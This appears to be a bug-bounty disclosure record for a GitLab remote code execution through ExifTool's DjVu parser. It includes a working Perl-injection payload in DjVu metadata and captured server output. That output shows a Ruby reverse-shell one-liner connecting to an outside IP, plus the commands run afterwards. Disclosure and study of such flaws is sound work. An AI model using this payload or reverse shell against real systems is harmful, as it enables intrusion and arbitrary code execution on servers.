24237 0.0 0.0 288904 59208 ? Sl Mar10 6:50 /opt/td-agent/bin/ruby /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid\n root 24242 20.6 0.5 3044156 391860 ? Sl Mar10 8337:18 /opt/td-agent/bin/ruby -Eascii-8bit:ascii-8bit /opt/td-agent/bin/fluentd --log /var/log/td-agent/td-agent.log --daemon /var/run/td-agent/td-agent.pid --under-supervisor\n git 24253 51.3 2.0 2857244 1349560 ? Sl 12:29 23:03 puma: cluster worker 13: 7369 [gitlab-puma-worker]\n root 24667 0.1 0.0 0 0 ? I 11:29 0:11 [kworker/u32:4]\n root 24911 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:2]\n root 25156 0.2 0.0 0 0 ? I 12:59 0:01 [kworker/u32:5]\n root 25516 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/1:1]\n git 25517 50.4 2.1 2870560 1443204 ? Sl 12:30 21:58 puma: cluster worker 6: 7369 [gitlab-puma-worker]\n git 25521 49.9 1.8 2550792 1218900 ? Sl 13:00 7:06 puma: cluster worker 4: 7369 [gitlab-puma-worker]\n root 25525 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/3:2]\n root 25527 0.0 0.0 0 0 ? I 07:36 0:00 [kworker/15:2]\n root 26983 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/10:2]\n root 27893 0.0 0.0 0 0 ? I< 2020 0:00 [xfsalloc]\n root 27894 0.0 0.0 0 0 ? I< 2020 0:00 [xfs_mru_cache]\n git 28051 49.9 1.8 2635012 1248076 ? Sl 13:03 5:34 puma: cluster worker 11: 7369 [gitlab-puma-worker]\n git 28140 50.3 2.1 2943756 1397844 ? Sl 12:33 20:26 puma: cluster worker 14: 7369 [gitlab-puma-worker]\n git 29132 49.0 2.0 3164444 1367952 ? Sl 12:05 33:39 puma: cluster worker 1: 7369 [gitlab-puma-worker]\n root 30224 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/14:1]\n root 30233 0.0 0.0 0 0 ? I 06:02 0:00 [kworker/0:1]\n root 31940 0.0 0.0 278944 10648 ? Ssl 2020 6:14 /usr/lib/accountsservice/accounts-daemon\n root 32135 0.1 0.0 0 0 ? I 13:07 0:00 [kworker/u32:0]\n root 32388 0.0 0.0 0 0 ? I 01:32 0:00 [kworker/4:0]\n root 32453 5.3 0.0 1774984 40780 ? Sl 2020 13156:17 /opt/prometheus/mtail/mtail -progs /opt/prometheus/mtail/progs -logs /var/log/apt/term.log,/var/log/syslog,/var/log/td-agent/td-agent.log,/var/log/gitlab/gitlab-rails/*.log,/var/log/gitlab/unicorn/unicorn_stderr.log,/var/log/gitlab/unicorn/unicorn_stdout.log -logtostderr\n git 32635 49.4 2.1 3154204 1401116 ? Sl 12:09 31:54 puma: cluster worker 12: 7369 [gitlab-puma-worker]\n git 32703 48.7 1.8 2402308 1195496 ? Sl 13:08 3:01 puma: cluster worker 7: 7369 [gitlab-puma-worker]\n exit\n \n\n### Impact\n\n * Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file\n\n### Examples\n\necho_vakzz.jpg.zip (F1257008) \nreverse_shell.jpg.zip (F1257009)\n\n### What is the current _bug_ behavior?\n\nGitLab Workhorse will pass any file to ExifTool, greatly increasing the attack surface. The current bug is in the DjVu module of `ExifTool` which should ideally not ever be hit.\n\n### What is the expected _correct_ behavior?\n\n * There must be better ways of convert C escape sequences than using `eval`\n * Only the TIFF and JPEG modules should be used\n * GitLab Workhorse could check if the file is a valid TIFF of JPEG before passing it to ExifTool\n\n### Output of checks\n\nThis bug happens on GitLab.com\n\n#### Results of GitLab environment info\n \n \n System information\n System:\n Proxy: no\n Current User: git\n Using RVM: no\n Ruby Version: 2.7.2p137\n Gem Version: 3.1.4\n Bundler Version:2.1.4\n Rake Version: 13.0.3\n Redis Version: 6.0.10\n Git Version: 2.29.0\n Sidekiq Version:5.2.9\n Go Version: unknown\n \n GitLab information\n Version: 13.10.2-ee\n Revision: cc4224220e6\n Directory: /opt/gitlab/embedded/service/gitlab-rails\n DB Adapter: PostgreSQL\n DB Version: 12.6\n URL: http://192.168.0.127:9080\n HTTP Clone URL: http://192.168.0.127:9080/some-group/some-project.git\n SSH Clone URL: git@192.168.0.127:some-group/some-project.git\n Elasticsearch: no\n Geo: no\n Using LDAP: no\n Using Omniauth: yes\n Omniauth Providers:\n \n GitLab Shell\n Version: 13.17.0\n Repository storage paths:\n - default: /var/opt/gitlab/git-data/repositories\n GitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell\n Git: /opt/gitlab/embedded/bin/git\n \n\n## Impact\n\n * Anyone with the ability to upload an image that goes through the GitLab Workhorse could achieve RCE via a specially crafted file\n", "published": "2021-04-07T13:59:49", "modified": "2021-05-14T20:08:32", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/1154542", "reporter": "vakzz", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-05-26T02:37:31", "history": [{"bulletin": {"id": "H1:1154542", "hash": "354cd196845b5e3b58755e857856f679", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "GitLab: RCE when removing metadata with ExifTool", "description": "### Summary\nWhen uploading image files, GitLab Workhorse passes any files with the extensions [jpg|jpeg|tiff](https://gitlab.com/gitlab-org/gitlab/-/blob/v13.10.2-ee/workhorse/internal/upload/exif/exif.go#L104) through to [ExifTool](https://exiftool.org/) to remove any non-whitelisted tags.\n\nAn issue with this is that ExifTool will ignore the file extension and try to determine what the file is based on the content, allowing for any of the supported parsers to be hit instead of just JPEG and TIFF by just renaming the uploaded file.\n\nOne of the supported formats is [DjVu](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm). When parsing the DjVu annotation, the [tokens are evaled](https://github.com/exiftool/exiftool/blob/11.70/lib/Image/ExifTool/DjVu.pm#L233) to \"convert C escape sequences\". \n\nThere is some validation to try and ensure that everything is properly escaped, but a backslash followed by a newline is correctly handled allowing the quotes to be closed and arbitrary perl inserted and evaluated:\n\n```\n(metadata\n\t(Copyright \"\\\n\" . qx{echo vakzz >/tmp/vakzz} . \\\n\" b \") )\n```\n\n{F1257008} is an example DjVu file with the above metadata, and {F1257009} is an example that runs a reverse shell.\n\n### Steps to reproduce\n1. Download {F1257008} and unzip it\n1. Create a new snippet\n1. In the description field, hit \"Attach a file\"\n1. Select and uplaod `echo_vakzz.jpg`\n1. See that the file `/tmp/vakzz` has been created on the server\n\n\nUploading {F1257009} to https://gitlab.com/-/snippets/new resulted in a shell on `web-09-sv-gprd`:\n\n```\nConnection from [34.74.90.73] port 12345 [tcp/*] accepted (family 2, sport 17073)\nid\nuid=500(git) gid=500(git) groups=500(git)\nhostname -a\nweb-09-sv-gprd\nps auxww\nUSER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\nroot 1 0.0 0.0 185524 5496 ? Ss 2020 28:31 /sbin/init\nroot 2 0.0 0.0 0 0 ? S 2020 1:44 [kthreadd]\nroot 4 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/0:0H]\nroot 6 0.0 0.0 0 0 ? I< 2020 0:00 [mm_percpu_wq]\nroot 7 0.0 0.0 0 0 ? S 2020 22:50 [ksoftirqd/0]\nroot 8 0.1 0.0 0 0 ? I 2020 552:25 [rcu_sched]\nroot 9 0.0 0.0 0 0 ? I 2020 0:00 [rcu_bh]\nroot 10 0.0 0.0 0 0 ? S 2020 1:05 [migration/0]\nroot 11 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/0]\nroot 12 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/0]\nroot 13 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/1]\nroot 14 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/1]\nroot 15 0.0 0.0 0 0 ? S 2020 1:03 [migration/1]\nroot 16 0.0 0.0 0 0 ? S 2020 20:27 [ksoftirqd/1]\nroot 18 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/1:0H]\nroot 19 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/2]\nroot 20 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/2]\nroot 21 0.0 0.0 0 0 ? S 2020 1:04 [migration/2]\nroot 22 0.0 0.0 0 0 ? S 2020 18:14 [ksoftirqd/2]\nroot 24 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/2:0H]\nroot 25 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/3]\nroot 26 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/3]\nroot 27 0.0 0.0 0 0 ? S 2020 1:05 [migration/3]\nroot 28 0.0 0.0 0 0 ? S 2020 17:57 [ksoftirqd/3]\nroot 30 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/3:0H]\nroot 31 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/4]\nroot 32 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/4]\nroot 33 0.0 0.0 0 0 ? S 2020 1:05 [migration/4]\nroot 34 0.0 0.0 0 0 ? S 2020 17:09 [ksoftirqd/4]\nroot 36 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/4:0H]\nroot 37 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/5]\nroot 38 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/5]\nroot 39 0.0 0.0 0 0 ? S 2020 1:05 [migration/5]\nroot 40 0.0 0.0 0 0 ? S 2020 16:56 [ksoftirqd/5]\nroot 42 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/5:0H]\nroot 43 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/6]\nroot 44 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/6]\nroot 45 0.0 0.0 0 0 ? S 2020 1:05 [migration/6]\nroot 46 0.0 0.0 0 0 ? S 2020 16:33 [ksoftirqd/6]\nroot 48 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/6:0H]\nroot 49 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/7]\nroot 50 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/7]\nroot 51 0.0 0.0 0 0 ? S 2020 1:05 [migration/7]\nroot 52 0.0 0.0 0 0 ? S 2020 16:25 [ksoftirqd/7]\nroot 54 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/7:0H]\nroot 55 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/8]\nroot 56 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/8]\nroot 57 0.0 0.0 0 0 ? S 2020 1:06 [migration/8]\nroot 58 0.0 0.0 0 0 ? S 2020 16:22 [ksoftirqd/8]\nroot 60 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/8:0H]\nroot 61 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/9]\nroot 62 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/9]\nroot 63 0.0 0.0 0 0 ? S 2020 1:05 [migration/9]\nroot 64 0.0 0.0 0 0 ? S 2020 15:52 [ksoftirqd/9]\nroot 66 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/9:0H]\nroot 67 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/10]\nroot 68 0.0 0.0 0 0 ? S 2020 1:05 [watchdog/10]\nroot 69 0.0 0.0 0 0 ? S 2020 1:06 [migration/10]\nroot 70 0.0 0.0 0 0 ? S 2020 16:10 [ksoftirqd/10]\nroot 72 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/10:0H]\nroot 73 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/11]\nroot 74 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/11]\nroot 75 0.0 0.0 0 0 ? S 2020 1:06 [migration/11]\nroot 76 0.0 0.0 0 0 ? S 2020 16:08 [ksoftirqd/11]\nroot 78 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/11:0H]\nroot 79 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/12]\nroot 80 0.0 0.0 0 0 ? S 2020 1:09 [watchdog/12]\nroot 81 0.0 0.0 0 0 ? S 2020 1:03 [migration/12]\nroot 82 0.0 0.0 0 0 ? S 2020 17:07 [ksoftirqd/12]\nroot 84 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/12:0H]\nroot 85 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/13]\nroot 86 0.0 0.0 0 0 ? S 2020 1:06 [watchdog/13]\nroot 87 0.0 0.0 0 0 ? S 2020 1:06 [migration/13]\nroot 88 0.0 0.0 0 0 ? S 2020 16:45 [ksoftirqd/13]\nroot 90 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/13:0H]\nroot 91 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/14]\nroot 92 0.0 0.0 0 0 ? S 2020 1:04 [watchdog/14]\nroot 93 0.0 0.0 0 0 ? S 2020 1:05 [migration/14]\nroot 94 0.0 0.0 0 0 ? S 2020 16:27 [ksoftirqd/14]\nroot 96 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/14:0H]\nroot 97 0.0 0.0 0 0 ? S 2020 0:00 [cpuhp/15]\nroot 98 0.0 0.0 0 0 ? S 2020 1:07 [watchdog/15]\nroot 99 0.0 0.0 0 0 ? S 2020 1:07 [migration/15]\nroot 100 0.0 0.0 0 0 ? S 2020 16:35 [ksoftirqd/15]\nroot 102 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/15:0H]\nroot 103 0.0 0.0 0 0 ? S 2020 0:00 [kdevtmpfs]\nroot 104 0.0 0.0 0 0 ? I< 2020 0:00 [netns]\nroot 105 0.0 0.0 0 0 ? S 2020 0:00 [rcu_tasks_kthre]\nroot 106 0.0 0.0 0 0 ? S 2020 0:00 [kauditd]\nroot 110 0.0 0.0 0 0 ? S 2020 0:33 [khungtaskd]\nroot 111 0.0 0.0 0 0 ? S 2020 0:11 [oom_reaper]\nroot 112 0.0 0.0 0 0 ? I< 2020 0:00 [writeback]\nroot 113 0.0 0.0 0 0 ? S 2020 0:51 [kcompactd0]\nroot 114 0.0 0.0 0 0 ? SN 2020 0:00 [ksmd]\nroot 115 0.0 0.0 0 0 ? SN 2020 3:10 [khugepaged]\nroot 116 0.0 0.0 0 0 ? I< 2020 0:00 [crypto]\nroot 117 0.0 0.0 0 0 ? I< 2020 0:00 [kintegrityd]\nroot 118 0.0 0.0 0 0 ? I< 2020 0:00 [kblockd]\nroot 119 0.0 0.0 0 0 ? I< 2020 0:00 [ata_sff]\nroot 120 0.0 0.0 0 0 ? I< 2020 0:00 [md]\nroot 121 0.0 0.0 0 0 ? I< 2020 0:00 [edac-poller]\nroot 122 0.0 0.0 0 0 ? I< 2020 0:00 [devfreq_wq]\nroot 123 0.0 0.0 0 0 ? I< 2020 0:00 [watchdogd]\nroot 127 0.0 0.0 0 0 ? S 2020 76:51 [kswapd0]\nroot 128 0.0 0.0 0 0 ? I< 2020 0:00 [kworker/u33:0]\nroot 129 0.0 0.0 0 0 ? S 2020 0:00 [ecryptfs-kthrea]\nroot 172 0.0 0.0 0 0 ? I< 2020 0:00 [kthrotld]\nroot 173 0.0 0.0 0 0 ? I< 2020 0:00 [acpi_thermal_pm]\nroot 174 0.0 0.0 0 0 ? S 2020 0:00 [scsi_eh_0]\nroot 175 0.0 0.0 0 0 ? I< 2020 0:00 [scsi_tmf_0]\nroot 183 0.0 0.0 0 0 ? I< 2020 0:00 [ipv6_addrconf]\nroot 195 0.0 0.0 0 0 ? I< 2020 0:00 [kstrp]\nroot 212 0.0 0.0 0 0 ? I< 2020 0:00 [charger_manager]\nroot 406 0.0 0.0 0 0 ? I< 2020 0:00 [raid5wq]\nroot 454 0.0 0.0 0 0 ? S 2020 10:42 [jbd2/sda1-8]\nroot 455 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nroot 515 0.0 0.0 0 0 ? I< 2020 11:09 [kworker/12:1H]\nroot 522 0.0 0.0 0 0 ? I< 2020 0:00 [iscsi_eh]\nroot 525 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-wq]\nroot 526 0.0 0.0 0 0 ? I< 2020 0:00 [ib-comp-unb-wq]\nroot 527 0.0 0.0 0 0 ? I< 2020 0:00 [ib_mcast]\nroot 528 0.0 0.0 0 0 ? I< 2020 0:00 [ib_nl_sa_wq]\nroot 531 0.0 0.0 0 0 ? I< 2020 0:00 [rdma_cm]\nroot 542 0.0 0.0 0 0 ? I< 2020 10:56 [kworker/6:1H]\nroot 549 0.0 0.0 0 0 ? I< 2020 0:00 [rpciod]\nroot 550 0.0 0.0 0 0 ? I< 2020 0:00 [xprtiod]\nroot 565 0.0 0.0 102968 824 ? Ss 2020 0:00 /sbin/lvmetad -f\nroot 595 0.0 0.0 42604 3368 ? Ss 2020 2:12 /lib/systemd/systemd-udevd\nroot 596 0.0 0.0 12204 4680 ? Ss 2020 451:18 /usr/sbin/haveged --Foreground --verbose=1 -w 1024\nroot 597 0.0 0.0 97900 38924 ? Ss 2020 113:30 /lib/systemd/systemd-journald\nroot 763 0.0 0.0 0 0 ? S 2020 0:00 [hwrng]\nroot 798 0.0 0.0 0 0 ? I< 2020 1:33 [kworker/13:1H]\nroot 814 0.0 0.0 0 0 ? S 2020 12:32 [jbd2/sdb-8]\nroot 815 0.0 0.0 0 0 ? I< 2020 0:00 [ext4-rsv-conver]\nprometh+ 969 0.6 0.0 720896 31292 ? Sl 2020 1997:39 /opt/prometheus/node_exporter/node_exporter --web.listen-address=:9100 --collector.mountstats --collector.nfs --collector.ntp --collector.textfile.directory=/opt/prometheus/node_exporter/metrics --collector.filesystem.ignored-fs-types=^(autofs|binfmt_misc|bpf|cgroup2?|configfs|debugfs|devpts|devtmpfs|fusectl|hugetlbfs|iso9660|mqueue|nfs.*|nsfs|overlay|proc|procfs|pstore|rpc_pipefs|securityfs|selinuxfs|squashfs|sysfs|tracefs)$ --collector.netstat.fields=^(.*_(InErrors|InErrs)|Ip_Forwarding|Ip(6|Ext)_(InOctets|OutOctets)|Icmp6?_(InMsgs|OutMsgs)|TcpExt_(Listen.*|Syncookies.*|TCPSynRetrans)|Tcp_(ActiveOpens|InSegs|OutSegs|OutRsts|PassiveOpens|RetransSegs|CurrEstab)|Udp6?_(InDatagrams|OutDatagrams|NoPorts|RcvbufErrors|SndbufErrors))$\nroot 1224 0.0 0.0 0 0 ? I< 2020 1:36 [kworker/10:1H]\nroot 1230 0.0 0.0 16124 2920 ? Ss 2020 0:01 /sbin/dhclient -1 -v -pf /run/dhclient.ens4.pid -lf /var/lib/dhcp/dhclient.ens4.leases -I -df /var/lib/dhcp/dhclient6.ens4.leases ens4\nroot 1386 0.0 0.0 5220 112 ? Ss 2020 6:09 /sbin/iscsid\nroot 1389 0.0 0.0 5720 3512 ? S<Ls 2020 29:44 /sbin/iscsid\nroot 1407 0.0 0.0 382660 408 ? Ssl 2020 3:07 /usr/bin/lxcfs /var/lib/lxcfs/\nroot 1426 0.0 0.0 27728 2320 ? Ss 2020 3:41 /usr/sbin/cron -f\nsyslog 1446 0.0 0.0 256392 2112 ? Ssl 2020 56:37 /usr/sbin/rsyslogd -n\nroot 1476 0.0 0.0 28628 2648 ? Ss 2020 0:51 /lib/systemd/systemd-logind\nroot 1512 0.0 0.0 4396 1208 ? Ss 2020 0:00 /usr/sbin/acpid\ndaemon 1525 0.0 0.0 26044 1464 ? Ss 2020 0:00 /usr/sbin/atd -f\npostfix 1570 0.0 0.0 67476 4488 ? S 12:40 0:00 pickup -l -t fifo -u\nroot 1593 0.0 0.0 4392 904 ? Ss 2020 7:41 runsvdir -P /etc/service log: /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:13:54 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:13:58 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.10 - - [07/Apr/2021:13:14:09 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process 10.219.1.9 - - [07/Apr/2021:13:14:13 UTC] \"GET /process HTTP/1.1\" 200 153 - -> /process\ngit 1594 50.1 2.0 2843912 1351680 ? Sl 12:40 17:00 puma: cluster worker 0: 7369 [gitlab-puma-worker]\nmessage+ 1599 0.0 0.0 43028 3356 ? Ss 2020 1:36 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation\nroot 1615 0.0 0.0 4240 1200 ? Ss 2020 0:26 runsv apt_metrics\nroot 1617 0.0 0.0 4240 1104 ? Ss 2020 0:03 runsv node_exporter\nroot 1618 0.0 0.0 4240 1104 ? Ss 2020 4:24 runsv ntpd_metrics\nroot 1620 0.0 0.0 4240 380 ? Ss 2020 0:00 runsv gitlab-monitor\nroot 1621 0.0 0.0 4240 388 ? Ss 2020 0:00 runsv mtail\nroot 1623 0.0 0.0 0 0 ? I< 2020 15:18 [kworker/0:1H]\nroot 1624 0.0 0.0 4384 252 ? S 2020 0:04 svlogd -tt /var/log/mtail\nroot 1625 0.0 0.0 4384 380 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_apt_metrics\nroot 1626 0.0 0.0 4384 224 ? S 2020 0:00 svlogd -tt /var/log/prometheus/node_exporter_ntpd_metrics\nroot 1627 0.0 0.0 4384 236 ? S 2020 0:02 svlogd -tt /var/log/prometheus/node_exporter\nroot 1628 0.0 0.0 4384 240 ? S 2020 0:00 svlogd -tt /var/log/gitlab-monitor\nroot 1713 0.0 0.0 13372 908 ? Ss 2020 0:02 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog\nroot 1716 0.0 0.0 0 0 ? I< 2020 0:46 [kworker/14:1H]\nroot 1844 0.0 0.0 0 0 ? I< 2020 0:00 [nfsiod]\nroot 1850 0.0 0.0 277088 2224 ? Ssl 2020 0:36 /usr/lib/policykit-1/polkitd --no-debug\nroot 1878 0.0 0.0 0 0 ? I< 2020 5:54 [kworker/2:1H]\nroot 2084 0.0 0.0 0 0 ? I Apr06 0:00 [kworker/6:0]\nroot 2095 0.0 0.0 65512 3084 ? Ss 2020 0:04 /usr/sbin/sshd -D\nroot 2102 0.0 0.0 0 0 ? I< 2020 2:31 [kworker/9:1H]\nroot 2120 0.0 0.0 0 0 ? I< 2020 5:08 [kworker/3:1H]\nroot 2138 0.0 0.0 0 0 ? I< 2020 0:31 [kworker/15:1H]\nroot 2146 0.0 0.0 0 0 ? I< 2020 23:45 [kworker/1:1H]\nroot 2151 0.0 0.0 0 0 ? I< 2020 0:40 [kworker/4:1H]\nroot 2167 0.0 0.0 14656 1372 tty1 Ss+ 2020 0:00 /sbin/agetty --noclear tty1 linux\nroot 2177 0.0 0.0 14472 1556 ttyS0 Ss+ 2020 0:00 /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220\nntp 2204 0.0 0.0 40268 2576 ? Ss 2020 21:06 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -c /var/lib/ntp/ntp.conf.dhcp -u 112:116\nroot 2270 0.0 0.0 67480 18788 ? Ss 2020 17:03 /usr/bin/python3 /usr/bin/google_ip_forwarding_daemon\nroot 2272 0.0 0.0 67220 16368 ? Ss 2020 10:50 /usr/bin/python3 /usr/bin/google_clock_skew_daemon\nroot 2402 0.0 0.0 65408 2460 ? Ss 2020 1:05 /usr/lib/postfix/sbin/master\npostfix 2411 0.0 0.0 67640 1988 ? S 2020 0:23 qmgr -l -t fifo -u\nroot 2571 0.0 0.0 4392 848 ? Ss 2020 2:50 runsvdir -P /opt/gitlab/service log: ...........................................................................................................................................................................................................................................................................................................................................................................................................\nroot 2618 0.0 0.0 4240 1104 ? Ss 2020 0:01 runsv puma\nroot 2621 0.0 0.0 4240 1192 ? Ss 2020 0:05 runsv logrotate\nroot 2623 0.0 0.0 4240 1144 ? Ss 2020 0:00 runsv nginx\nroot 2625 0.0 0.0 4240 1092 ? Ss 2020 0:01 runsv gitlab-workhorse\ngitlab-+ 3150 0.0 0.0 754368 26924 ? Sl Feb17 35:28 /opt/ruby-2.7.0/bin/ruby /opt/gitlab-monitor/bin/gitlab-mon web -c /opt/gitlab-monitor/config/worker-config.yml\nroot 3164 0.0 0.0 0 0 ? I< 2020 0:12 [kworker/11:1H]\nroot 3211 0.2 0.0 0 0 ? I 12:42 0:04 [kworker/u32:2]\nroot 3222 0.0 0.0 0 0 ? I< 2020 0:15 [kworker/7:1H]\nroot 3463 0.0 0.0 0 0 ? I 10:35 0:00 [kworker/5:1]\nroot 3511 0.0 0.0 0 0 ? I 11:40 0:00 [kworker/12:0]\nroot 4032 0.0 0.1 1571276 107596 ? Ssl 2020 172:34 /opt/prometheus/ebpf_exporter/ebpf_exporter --web.listen-address=:9435 --config.file=/opt/prometheus/ebpf_exporter/config.yml\nroot 4171 0.0 0.0 4376 640 ? S 13:12 0:00 sleep 600\nroot 4302 0.0 0.0 0 0 ? I< 2020 2:25 [kworker/5:1H]\nroot 4391 0.0 0.0 0 0 ? I< 2020 0:14 [kworker/8:1H]\nroot 4699 0.0 0.0 0 0 ? I 11:09 0:00 [kworker/13:2]\nroot 4812 0.0 0.0 4376 672 ? S 13:13 0:00 sleep 60\nroot 5375 0.0 0.0 4504 788 ? Ss 13:13 0:00 /bin/sh /opt/gitlab/embedded/bin/gitlab-logrotate-wrapper\nroot 5379 0.0 0.0 4376 748 ? S 13:13 0:00 sleep 600\ngit 5398 49.7 1.9 2661404 1274712 ? Sl 12:44 14:43 puma: cluster worker 3: 7369 [gitlab-puma-worker]\ngit 5544 1.3 0.0 45604 27664 ? S 13:14 0:00 /usr/bin/perl -w /opt/gitlab/embedded/bin/exiftool -all= --IPTC:all --XMP-iptcExt:all -tagsFromFile @ -ResolutionUnit -XResolution -YResolution -YCbCrSubSampling -YCbCrPositioning -BitsPerSample -ImageHeight -ImageWidth -ImageSize -Copyright -CopyrightNotice -Orientation -\ngit 5545 0.0 0.0 0 0 ? Z 13:14 0:00 [sh] <defunct>\ngit 5551 0.0 0.0 105260 10840 ? S 13:14 0:00 ruby -rsocket -e exit if fork;c=TCPSocket.new(\"103.3.61.137\",12345);while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end\ngit 5667 0.0 0.0 4504 740 ? S 13:14 0:00 sh -c ps auxww\ngit 5668 0.0 0.0 34424 2864 ? R 13:14 0:00 ps auxww\nroot 5952 0.0 0.0 0 0 ? I 00:24 0:00 [kworker/5:2]\nroot 6812 0.0 0.0 54640 7080 ? Ss Mar08 0:00 nginx: master process /opt/gitlab/embedded/sbin/nginx -p /var/opt/gitlab/nginx\ngitlab-+ 6813 0.0 0.0 59476 12544 ? S Mar08 18:42 nginx: worker process\ngitlab-+ 6814 0.0 0.0 59380 13704 ? S Mar08 18:28 nginx: worker process\ngitlab-+ 6815 0.0 0.0 59504 13088 ? S Mar08 18:57 nginx: worker process\ngitlab-+ 6816 0.0 0.0 59456 13048 ? S Mar08 19:35 nginx: worker process\ngitlab-+ 6817 0.0 0.0 59468 13396 ? S Mar08 18:41 nginx: worker process\ngitlab-+ 6818 0.0 0.0 59508 13700 ? S Mar08 20:20 nginx: worker process\ngitlab-+ 6819 0.0 0.0 59492 13220 ? S Mar08 19:33 nginx: worker process\ngitlab-+ 6820 0.0 0.0 59460 13420 ? S Mar08 22:00 nginx: worker process\ngitlab-+ 6821 0.0 0.0 59508 13420 ? S Mar08 24:15 nginx: worker process\ngitlab-+ 6822 0.0 0.0 59500 13348 ? S Mar08 20:53 nginx: worker process\ngitlab-+ 6823 0.0 0.0 59660 13588 ? S Mar08 27:47 nginx: worker process\ngitlab-+ 6824 0.0 0.0 59972 14116 ? S Mar08 37:52 nginx: worker process\ngitlab-+ 6825 4.0 0.0 63940 18592 ? S Mar08 1788:21 nginx: worker process\ngitlab-+ 6826 1.9 0.0 61436 15808 ? S Mar08 854:41 nginx: worker process\ngitlab-+ 6827 0.1 0.0 60120 14564 ? S Mar08 79:52 nginx: worker process\ngitlab-+ 6828 0.8 0.0 62348 16532 ? S Mar08 351:59 nginx: worker process\ngitlab-+ 6829 0.0 0.0 54836 3732 ? S Mar08 0:08 nginx: cache manager process\ngit 6952 17.6 0.1 1532460 109784 ? Ssl 10:04 33:35 /opt/gitlab/embedded/bin/gitlab-workhorse -listenNetwork unix -listenUmask 0 -listenAddr /var/opt/gitlab/gitlab-workhorse/sockets/socket -authBackend http://localhost:8080 -authSocket /var/opt/gitlab/gitlab-rails/sockets/gitlab.socket -documentRoot /opt/gitlab/embedded/service/gitlab-rails/public -pprofListenAddr -apiLimit 5 -apiQueueDuration 60s -apiQueueLimit 200 -prometheusListenAddr 0.0.0.0:9229 -secretPath /opt/gitlab/embedded/service/gitlab-rails/.gitlab_workhorse_secret -logFormat json -config config.toml\ngit 7369 10.3 1.5 1859556 1033020 ? Ssl 10:04 19:41 puma 5.1.1 (unix:///var/opt/gitlab/gitlab-rails/sockets/gitlab.socket,tcp://0.0.0.0:8080) [gitlab-puma-worker]\nroot 7522 0.0 0.0 0 0 ? I 10:04 0:00 [kworker/11:2]\nroot 8263 0.0 0.0 0 0 ? I 12:15 0:00 [kworker/14:0]\nroot 8266 0.0 0.0 0 0 ? I 08:19 0:00 [kworker/0:2]\nroot 8581 0.1 0.0 0 0 ? I 12:48 0:02 [kworker/u32:1]\nroot 9122 0.0 0.0 0 0 ? I 10:37 0:00 [kworker/8:0]\ngit 9978 47.0 2.0 3182348 1362056 ? Sl 11:43 42:45 puma: cluster worker 8: 7369 [gitlab-puma-worker]\nconsul 10871 0.5 0.2 257480 143704 ? Ssl 2020 2836:38 /opt/consul/1.7.2/consul agent -config-file=/etc/consul/consul.json -config-dir=/etc/consul/conf.d\ngit 10980 51.1 